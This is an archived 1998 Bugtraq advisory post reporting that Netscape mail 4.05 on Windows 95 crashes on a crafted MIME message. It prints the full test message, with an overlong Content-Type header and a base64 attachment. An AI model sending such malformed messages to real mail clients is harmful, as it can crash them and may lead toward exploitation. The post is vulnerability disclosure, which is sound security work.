[7448] in bugtraq
netscape mail overflow(another one)
daemon@ATHENA.MIT.EDU (Paul Boehm)
Wed Jul 29 01:36:12 1998
Date: Tue, 28 Jul 1998 20:21:41 +0200
Reply-To: Paul Boehm <paul@BOEHM.ORG>
From: Paul Boehm <paul@BOEHM.ORG>
To: BUGTRAQ@NETSPACE.ORG
Hi,
netscape mail crashes when trying to the attachment
from the following pseudo mime mail:
From: Paul Boehm <paul@boehm.org>
To: paul@boehm.org
Subject: test
Mime-Version: 1.0
Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
--ABC123
Content-Type: text/plain; charset=us-ascii
test123
--ABC123
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AA"
H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
AADwvx2CTC7aACgAAA==
--ABC--
i suppose this is exploitable, but i don't really know.
i only tested this with win95 netscape 4.05.
bye,
paul
--
[ Paul S. Boehm | paul@boehm.priv.at | http://paul.boehm.org/ | infected@irc ]
Money is what gives a programmer his resources. It's an exchange system created
by human beings. It surrounds us. Works for us, binds the economy together.
